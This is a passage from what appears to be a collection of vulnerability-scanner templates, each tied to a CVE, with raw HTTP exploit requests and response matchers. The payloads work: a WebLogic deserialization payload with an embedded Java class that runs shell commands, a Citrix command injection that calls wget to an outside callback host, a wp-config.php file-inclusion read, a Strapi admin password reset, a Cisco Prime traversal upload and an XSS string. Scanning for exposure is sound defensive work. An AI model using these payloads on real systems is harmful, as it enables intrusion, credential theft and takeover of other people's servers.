index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end 